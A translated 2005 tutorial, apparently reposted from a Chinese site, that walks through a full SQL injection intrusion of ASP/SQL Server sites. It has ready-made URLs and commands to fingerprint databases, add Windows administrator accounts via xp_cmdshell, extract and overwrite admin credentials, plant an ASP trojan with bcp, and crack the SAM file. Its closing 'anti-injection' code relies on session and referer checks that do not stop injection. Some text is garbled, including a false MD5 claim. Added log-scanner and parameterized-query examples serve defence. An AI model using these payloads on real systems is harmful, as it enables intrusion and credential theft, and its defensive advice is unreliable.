SQL injection incomplete thinking and anti-injection program

Source: Internet
Author: User
Article category: Database Security | Release date: 2005-2-13, Sunday

Reposted from: Dynamic Network production guide, www.knowsky.com

<1> SQL injection overview

Many web programs are written without checking the legality of user input, which leaves the application with security problems. A user can submit database query code (usually through the browser address bar, over the normal WWW port) and, from the results the program returns, obtain data he wants to know. This is called SQL injection.

<2> SQL injection ideas

The idea is the most important thing; in fact, many people do not know what SQL injection can do. Here is a summary of the overall idea of an SQL injection intrusion:

1. Judge the SQL injection vulnerability, that is, find the injection point.

2. Determine the type of the back-end database.

3. Determine whether xp_cmdshell can be executed. If the account used by the current connection has SA permission and the Master.dbo.xp_cmdshell extended stored procedure (calling this stored procedure gives a shell that uses the operating system directly) can execute correctly, the entire computer can be fully controlled in several ways, which completes the whole injection process; otherwise continue with:

(1) Discover the Web virtual directory;

(2) Upload an ASP Trojan horse;

(3) Obtain administrator privileges.

Specific steps:

I. Judging the SQL injection vulnerability

If you have not done injection before, first uncheck IE menu: Tools > Internet Options > Advanced > "Show friendly HTTP error messages".

To make the problem clear, the following uses HTTP://www.163.com/news.asp?id=xx (this address is hypothetical) as an example; xx may be an integer or a string.

1. Judging an integer parameter

When the input parameter xx is an integer, the SQL statement in news.asp typically looks like this:

SELECT * from table name where field=xx

so the existence of SQL injection can be tested with the following steps.

The simplest judgement method:

HTTP://www.163.com/news.asp?id=xx' (append a single quote)

At this point the SQL statement in news.asp becomes

SELECT * from table name where field=xx'

If the program does not filter the "'", news.asp will report a run-time error. This method is very simple, but it is not the best, because:

First, not every server's IIS returns the specific error message to the client, and if the program uses something like CInt(parameter), the SQL injection will not succeed; the server still complains, but the message is only the generic "An error occurred on the server when processing the URL. Please contact your system administrator."

Second, most programmers already filter out "'", so a failed "'" test does not mean there is no injection point. This is why the classic 1=1 and 1=2 test method is generally used; see below:

HTTP://www.163.com/news.asp?id=xx and 1=1: news.asp runs normally,

and the result is the same as that of HTTP://www.163.com/news.asp?id=xx;

HTTP://www.163.com/news.asp?id=xx and 1=2: news.asp runs abnormally. (This is the classic 1=1 / 1=2 judgement method.)

If both of the above are satisfied, news.asp has an SQL injection vulnerability; otherwise it cannot be injected.

2. Judging a string parameter

The method is basically the same as for an integer parameter.

When the input parameter xx is a string, the SQL statement in news.asp typically looks like this:

SELECT * from table name where field='xx'

and the following procedure can be used to test whether SQL injection exists.

HTTP://www.163.com/news.asp?id=xx' (append a single quote): the SQL statement in news.asp becomes SELECT * from table name where field='xx'', and news.asp runs abnormally;

HTTP://www.163.com/news.asp?id=xx and '1'='1': news.asp runs normally,

and the result is the same as that of HTTP://www.163.com/news.asp?id=xx;

HTTP://www.163.com/news.asp?id=xx and '1'='2': news.asp runs abnormally.

If the above is satisfied, news.asp has an SQL injection vulnerability; otherwise it cannot be injected.

3. Handling special circumstances

Sometimes ASP programmers filter out single quotes and other characters in the program to prevent SQL injection. At this point you can try several approaches:

① Case mixing: because VBS is not case-sensitive, programmers often filter only all-uppercase or all-lowercase strings and overlook mixed case, e.g. using SelecT instead of select or SELECT;

② Unicode method: in IIS, internationalization is done with the Unicode character set, so the string can be entered in IE as a Unicode (URL-encoded) string, e.g. + = %2b, space = %20, and so on; see Annex I for UrlEncode information;

③ ASCII code method: some or all of the input characters can all be

<4> Besides the above methods, there is a simpler way: use a ready-made tool. The NB Alliance's NBSI is a very good one; the latest version at present is 2.2.

II. Judging the database type

Different databases differ in their functions and injection methods, so the database type must be determined before injecting. The most commonly used databases for ASP are Access and SQL Server; over 99% of web sites use one of the two.

How do you get the program to tell you which database it uses? Look at this:

SQL Server has some system variables that can be read directly from the error message if the server's IIS error prompts are not turned off and SQL Server returns an error:

HTTP://www.163.com/news.asp?id=xx and user>0

This statement is simple, but it contains the essence of the SQL Server-specific injection method; I found this highly efficient guessing method myself in an unintentional test. Let us see what it means: the preceding statement is normal, the emphasis is on "and user>0". We know that user is a built-in variable of SQL Server whose value is the user name of the current connection, of type nvarchar. When an nvarchar value is compared with the int number 0, the system first tries to convert the nvarchar value to int, and of course this conversion errors out. SQL Server's error message is: "Syntax error converting the nvarchar value 'abc' to a column of data type int". Hehe, abc is the value of the variable user, so the database user name is obtained without the slightest effort. Later on you will see many statements of this kind.

Incidentally, as we all know, SQL Server's user sa is a role equivalent to Administrators permission, and with sa privileges it is almost certain that administrator rights on the host can be obtained. The above method can easily test whether the connection is logged in as sa; note that if it is sa, the hint is that converting "dbo" to int failed, rather than "sa".

If the server's IIS does not return error prompts, how do you determine the database type? We can start from the differences between Access and SQL Server: each has its own system tables, such as the table that holds all the objects in the database. In Access it is the system table [msysobjects], but reading that table in the web environment prompts "No permissions"; in SQL Server it is the table [sysobjects], which is readable in the web environment.

Once you have confirmed that injection is possible, use the following statements:

HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT(*) from sysobjects)>0
HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT(*) from msysobjects)>0

If the database is SQL Server, the page for the first URL is roughly the same as the original page HTTP://www.163.com/news.asp?id=xx, while the second URL prompts an error because the table msysobjects cannot be found; even if the program has fault-tolerant handling, the page is completely different from the original.

If the database is Access, the situation is different: the page for the first URL is completely different from the original page; for the second URL, it depends on whether the database settings allow the system table to be read, which is generally not allowed, so it is also completely different from the original. In most cases the first URL is enough to know the type of database the system uses; the second URL is only useful for verification when IIS error prompts are turned on.
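As an added, defender-side example that is not part of the original article: a Python scanner over IIS W3C log lines that flags the probe patterns from sections I and II above (the trailing quote, the 1=1 / 1=2 pair, user>0, sysobjects/msysobjects, a stacked ;exec). It URL-decodes and lower-cases the query string first, so the case-mixing and %xx-encoding tricks from the "special circumstances" section do not hide a probe. The log lines are constructed, and the W3C field layout is assumed.

```python
import re
from urllib.parse import unquote_plus

# Probe patterns taken from the judgement steps in sections I and II above.
# They are tested after URL-decoding and lower-casing, so case mixing and
# %xx encoding (the "special circumstances" bypasses) do not hide them.
PROBE_PATTERNS = {
    "trailing-quote":  re.compile(r"'\s*$"),                           # id=xx'
    "boolean-test":    re.compile(r"\band\s+'?1'?\s*=\s*'?[12]'?"),    # and 1=1 / and 1=2
    "user-cast-error": re.compile(r"\band\s+user\s*>\s*0"),            # and user>0
    "system-table":    re.compile(r"\bm?sysobjects\b"),                # sysobjects / msysobjects
    "stacked-exec":    re.compile(r";\s*exec\b|xp_cmdshell"),          # ;exec master..xp_cmdshell
}

# Assumed IIS W3C layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def normalize_query(raw_query):
    """Decode %xx and '+' and lower-case; IIS logs '-' for an empty query."""
    if raw_query == "-":
        return ""
    return unquote_plus(raw_query).lower()


def classify(query):
    """Return the names of every probe pattern that matches a decoded query."""
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(query)]


def scan_log(lines):
    """Parse W3C lines; return (ip, stem, decoded query, [probes]) for each hit."""
    hits = []
    for line in lines:
        if line.startswith("#"):  # W3C header directives
            continue
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        q = normalize_query(m.group("query"))
        probes = classify(q)
        if probes:
            hits.append((m.group("ip"), m.group("stem"), q, probes))
    return hits


# Constructed sample log (not real traffic): 10.0.0.5 walks the judgement
# steps from the article with mixed case and %-encoding; 10.0.0.9 is a normal visitor.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-02-13 10:00:01 10.0.0.9 GET /news.asp id=12 200
2005-02-13 10:00:05 10.0.0.5 GET /news.asp id=12' 500
2005-02-13 10:00:09 10.0.0.5 GET /news.asp id=12%20AnD%201=1 200
2005-02-13 10:00:12 10.0.0.5 GET /news.asp id=12+and+1=2 500
2005-02-13 10:00:20 10.0.0.5 GET /news.asp id=12%20and%20user%3E0 500
2005-02-13 10:00:31 10.0.0.5 GET /news.asp id=12%20and%20(select%20count(*)%20from%20sysobjects)%3E0 200
2005-02-13 10:00:40 10.0.0.5 GET /news.asp id=12;exec%20master.dbo.xp_cmdshell%20'dir';--%20 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, q, probes in scan_log(SAMPLE_LOG):
        print(ip, stem, probes, q)
```

One source address producing the whole sequence (quote, 1=1, 1=2, user>0, system table) within a minute is the signature worth alerting on, not any single line.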

III. Determining whether xp_cmdshell can be executed

If the account used by the current connection has SA permission and the Master.dbo.xp_cmdshell extended stored procedure (calling this stored procedure gives a shell that uses the operating system directly) can execute correctly, the entire computer can be fully controlled in the following ways, and all subsequent steps can be skipped:

1. HTTP://www.163.com/news.asp?id=xx and user>0: news.asp raises an error, but the user name of the current database connection can be obtained (if dbo is displayed, it means sa).

2. HTTP://www.163.com/news.asp?id=xx and db_name()>0: news.asp raises an error, but the name of the currently connected database can be obtained.

3. HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell "net user aaa bbb /add"-- (master is the name of SQL Server's main database; the semicolon indicates that SQL Server executes the statement before it and then continues with the statement after it; "--" is a comment, meaning everything after it is only a comment and is not executed by the system) directly adds the operating system account aaa with password bbb.

4. HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell "net localgroup Administrators aaa /add"-- adds the account aaa just created to the Administrators group.

5. HTTP://www.163.com/news.asp?id=xx;backup database name to disk='C:\inetpub\wwwroot\save.db' backs up all the database content into the web directory, after which the file can be downloaded over HTTP (of course, the web virtual directory must be known first).

6. Create a Unicode vulnerability by copying cmd:

HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell "copy C:\winnt\system32\cmd.exe C:\inetpub\scripts\cmd.exe"

creates a Unicode vulnerability; by exploiting it, control of the entire computer is completed (again, the web virtual directory must be known first).

So an SQL injection attack can be completed successfully. Do not get excited, though: in practice you will find that this is harder than in theory, and more difficulties are waiting for you. The following continues with the case where the above conditions do not hold and the struggle must go on (to plant a Trojan :)).

Go on~!

When the above conditions are not met, the following steps should be continued:

(i) Discovering the Web virtual directory

Only by finding the Web virtual directory can you determine where to place the ASP Trojan and then obtain user permissions. There are two fairly effective methods.

One is guessing based on experience. In general, the Web virtual directory is C:\inetpub\wwwroot, D:\inetpub\wwwroot or E:\inetpub\wwwroot, and the executable virtual directory is c:\inetpub\scripts, D:\inetpub\scripts, E:\inetpub\scripts, and so on.

The second is to traverse the directory structure of the system, analyse the results, and find the Web virtual directory.

First create a temporary table: temp

HTTP://www.163.com/news.asp?id=xx;create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--

Next:

1. We can use xp_availablemedia to get all the current drives and save them in the temp table:

HTTP://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

By querying the contents of temp we can get the list of drives and related information.

2. We can use xp_subdirs to get the subdirectory list and save it in the temp table:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3. We can also use xp_dirtree to obtain the directory tree structure of all subdirectories and store it in the temp table:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

This lets you browse the list of all directories (folders).

If we need to view the contents of a file, we can do so by executing xp_cmdshell:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

Or use the BULK INSERT syntax to insert a text file into the temporary table, such as:

BULK INSERT temp(id) from 'c:\inetpub\wwwroot\index.asp'

Browsing temp then shows the contents of the index.asp file! By analysing the various ASP files, a lot of system information, web construction and management information, and even the sa account's connection password can be obtained.

Of course, if xp_cmdshell can execute, we can use it to do this:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--

Through xp_cmdshell we can see everything we want, including W3SVC:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum W3SVC'

However, even without SA permission, we can still use:

HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

Attention:

1. After each browse is completed, you should delete all the contents of temp. The method is:

HTTP://www.163.com/news.asp?id=xx;delete from temp;--

2. Browse the temp table with (assuming TestDB is the database name of the current connection):

HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp)>0

This takes the value of the id field of the first record in table temp and compares it with an integer; obviously news.asp raises an error, but the value of the id field can be found in the error message. Assuming the discovered id value is XYZ, then

HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp where id not in ('XYZ'))>0

gets the value of the id field of the second record in table temp.

(ii) Uploading an ASP Trojan

A so-called ASP Trojan is ASP code with a special function. Put into the scripts directory under the Web virtual directory, it can be executed by a remote client through IE, which then gains system user permissions and initial control of the system. There are generally two fairly effective ways to upload an ASP Trojan:

1. Using the web site's remote management function

Many web sites provide remote management functions for the convenience of maintenance, and many web sites give different users different access rights to their content. To control user rights, there is a web page that requires a user name and password; only after entering the correct values can the next operation be carried out, which allows management of the site, such as uploading and downloading files, browsing directories, modifying the configuration, and so on.

Therefore, if you obtain the correct user name and password, you can not only upload an ASP Trojan, but sometimes even browse the system directly with user permissions, and the complicated "discovering the Web virtual directory" step above can be omitted.

The user name and password are generally stored in a table; find this table and read its contents and the problem is solved. Here are two effective ways to do this.

A. Injection method:

In theory, the authentication web page will have a statement of the form:

SELECT * from admin where username='XXX' and password='YYY'

If the necessary character filtering is not done before the statement is actually run, it is easy to carry out SQL injection.

If you type in the user name text box: abc' or 1=1-- and in the password box: 123, the SQL statement becomes:

SELECT * from admin where username='abc' or 1=1-- and password='123'

Whatever user name and password the user enters, this statement always executes correctly, and the user easily deceives the system and obtains a legitimate identity.
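As an added example (not from the original article), the authentication statement above in both forms: the concatenated version the article describes, and the parameterized version that prevents it. Python with an in-memory SQLite table stands in for the ASP/SQL Server code; the admin table and its single row are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the article's admin table (SQLite, one row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('www', 'secret')")
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """The article's vulnerable form: the input is spliced into the SQL text.
    Returns the number of admin rows the resulting statement matches."""
    sql = ("SELECT * FROM admin WHERE username='" + username +
           "' AND password='" + password + "'")
    return len(conn.execute(sql).fetchall())


def login_param(conn, username, password):
    """Hardened form: the statement text is fixed and the values are bound as
    parameters, so a quote or a -- in the input stays data and never becomes SQL."""
    sql = "SELECT * FROM admin WHERE username=? AND password=?"
    return len(conn.execute(sql, (username, password)).fetchall())


def compare(username, password):
    """Run the same credentials through both forms; returns (concat_rows, param_rows)."""
    conn = make_db()
    try:
        return login_concat(conn, username, password), login_param(conn, username, password)
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("www", "secret"))         # legitimate login: (1, 1)
    print(compare("abc' or 1=1--", "123"))  # the article's bypass: (1, 0)
```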

B. Guessing method:

The basic idea is: guess all the database names, guess the name of every table in the library, analyse which table names may store user names and passwords, guess each field name of that table, and guess the content of each record in the table.

a. Guess all the database names

HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT(*) from master.dbo.sysdatabases where name>1 and dbid=6)<>0

Because dbid values 1 to 5 are used by the system, user-created databases must start from 6. Since we submitted name>1 (name is a character field, and comparing it with a number errors out), news.asp raises an error and the first database name can be obtained. Similarly, setting dbid to 7, 8, 9, 10, 11, 12 ... gets all the database names.

In the following, the database name is assumed to be TestDB.

b. Guess the name of the user-name table in the database

Guessing method: this method guesses the table name based on personal experience. Generally speaking: user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts, and so on. Judge with the statement:

HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT(*) from TestDB.dbo.table name)>0

If the table name exists, news.asp works correctly, otherwise it errors. Loop like this until the name of the system account table is guessed.

Reading method: SQL Server has a table sysobjects that holds the core information of the system; all the tables and views of a library are stored in this table, and the table can be accessed through the web.

Records with xtype='U' and status>0 represent tables created by the user, so the user-name table can be found by examining each user table's name. The basic implementation is:

① HTTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0)>0

This takes the name of the first user-created table and compares it with an integer; obviously news.asp raises an error, but the table name can be found in the error message. Assuming the discovered table name is xyz, then

② HTTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz'))>0

gets the name of the second user-created table, and in the same way all the names of the created tables can be obtained.

From the table names, you can generally guess which table holds the user names and passwords; in the following this table is assumed to be named admin.

c. Guess the user name and password field names

The admin table must have a user name field and a password field. Only with the names of these two fields can their contents be obtained. There are again two ways to get the names.

Guessing method: this method guesses the field names based on personal experience. In general, the user name field is commonly named username, name, user or account, and the password field is commonly named password, pass, pwd or passwd, and so on. Judge with the statement:

HTTP://www.163.com/news.asp?id=xx and (select count(field name) from TestDB.dbo.admin)>0

The statement "select count(field name) from table name" gets the number of rows in the table, so if the field name exists, news.asp works correctly, otherwise it errors. Loop like this until the two field names are guessed.

Reading method: the basic implementation is

HTTP://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0

select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects obtains the first field name of a table with a known name from sysobjects; when it is compared with an integer, news.asp obviously raises an error, but the field name can be found in the error message. Replace the 1 in col_name(object_id('admin'),1) with 2, 3, 4, 5, 6 ... to get all the field names.

d. Guess the user names and passwords

The most common and effective way to guess the contents of the user names and passwords is:

ASCII character-by-character decoding: although this method is slow, it is certainly feasible. The basic idea is to guess the length of the field first, and then guess the value of each character in turn. Guessing the user name uses the same method as guessing the password; the following uses the user name as an example to illustrate the process.

HTTP://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=x

(x=1, 2, 3, 4, 5, ... n; username is the name of the user name field, admin is the name of the table.) If news.asp runs normally for some value i of x, then i is the length of the first user name. For example, when entering

HTTP://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8

news.asp works properly, so the first user name has length 8.

HTTP://www.163.com/news.asp?id=xx and (select top 1 ASCII(substring(username,m,1)) from TestDB.dbo.admin)=n

(The value of m is between 1 and the length of the user name obtained in the previous step; m=1, 2, 3, ... guesses the 1st, 2nd, 3rd, ... character respectively. The value of n is the ASCII value of 1~9, a~z, A~Z, that is, any value between 1~128; admin is the name of the system user account table.) If news.asp works normally for some value i of n, then i corresponds to a character of the user name. For example, when entering

HTTP://www.163.com/news.asp?id=xx and (select top 1 ASCII(substring(username,3,1)) from TestDB.dbo.admin)=80

news.asp functions correctly, so the third character of the user name is P (the ASCII of P is 80);

HTTP://www.163.com/news.asp?id=xx and (select top 1 ASCII(substring(username,9,1)) from TestDB.dbo.admin)=33

news.asp functions correctly, so the 9th character of the user name is ! (the ASCII of ! is 33).

After guessing the first user name and password, all the other user names and passwords can be guessed in the same way. Note: sometimes the resulting password may be encrypted with MD5 or similar means and a special tool is needed to decrypt it; alternatively change the password first, use it, and then change it back, as described below.

Simple method: guess the user name with HTTP://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1). flag is a field in the admin table and username is the user name field; at this point news.asp raises an error, but the username value can be obtained. With the same method you can get the second user name, the third, and so on, until all the user names in the table are obtained.

Guess the user password: HTTP://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1). flag is a field in the admin table and pwd is the password field; at this point news.asp raises an error, but the pwd value can be obtained. With the same method you can get the second user's password, the third user's password, and so on, until all the passwords in the table are obtained. The password is sometimes encrypted with MD5, in which case it can be changed:

HTTP://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd='a0b923820dcc509a' where username='www';--

(The MD5 value of 1 is Aaabbbcccdddeeef, that is, the password is changed to 1; www is a known user name.) In the same way, of course, the password can be changed back to its original value.

2. Using the table-content export function

SQL Server has a bcp command that can export the contents of a table into a text file placed at a specified location. Using this feature, we can first create a temporary table, enter an ASP Trojan into a row of the table, and then use the bcp command to export it as an ASP file.

The command line format is as follows:

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp -c -S localhost -U sa -P foobar

(The -S parameter is the server that executes the query, -U the user name, -P the password; finally a 163.asp Trojan has been uploaded.)

3. Using tools such as NBSI. Some reference data; the most important table names:

SELECT * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

Some of the most important user names (existing in the default SQL database):

public
dbo
guest (generally prohibited, or not authorized)
db_securityadmin
db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia: drive related
xp_dirtree: directory
xp_enumdsn: ODBC connections
xp_loginconfig: server security mode information
xp_makecab: create a compressed volume
xp_ntsec_enumdomains: domain information
xp_terminate_process: terminate a process, given a PID

(iii) Obtaining system administrator rights

An ASP Trojan only has user rights; to obtain full control of the system, system administrator rights are needed as well. What to do? There are a number of ways to elevate privileges:

Upload a Trojan and modify an .ini file that runs automatically at boot (as soon as it reboots, it is done for);

Copy cmd.exe to scripts, artificially creating a Unicode vulnerability;

Download the SAM file, crack it, and obtain all the OS user names and passwords;

And so on; depending on the specific circumstances of the system, different approaches can be taken.

So how do we prevent injection? The following program can be added to ASP, HTML, PHP or CGI; it has been tested. Add it at the beginning of a file such as top.asp.

Method One:

<%
' Deny the request unless the visitor already holds a logged-in session.
If Session("username") = "" Or Session("UserKey") = "" Then
    Response.Redirect "../../"
End If
%>

(Note: whenever there is user injection, jump to the ../../ directory, hehe, see how you inject me.)

Method Two:

<%
' Compare the host part of the referring URL with this server's own name.
server_v1 = CStr(Request.ServerVariables("HTTP_REFERER"))
server_v2 = CStr(Request.ServerVariables("SERVER_NAME"))
' Position 8 skips the leading "http://" of the referer.
If Mid(server_v1, 8, Len(server_v2)) <> server_v2 Then
    Response.Write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#eeeeee width=450>"
    Response.Write "<tr><td style=""font:9pt Verdana"">"
    Response.Write "You submitted the wrong path; submitting data from outside the site is prohibited. Please do not tamper with this parameter!"
    Response.Write "</td></tr></table></center>"
    Response.End
End If
%>

(Note: as long as there is user injection, it is judged as external
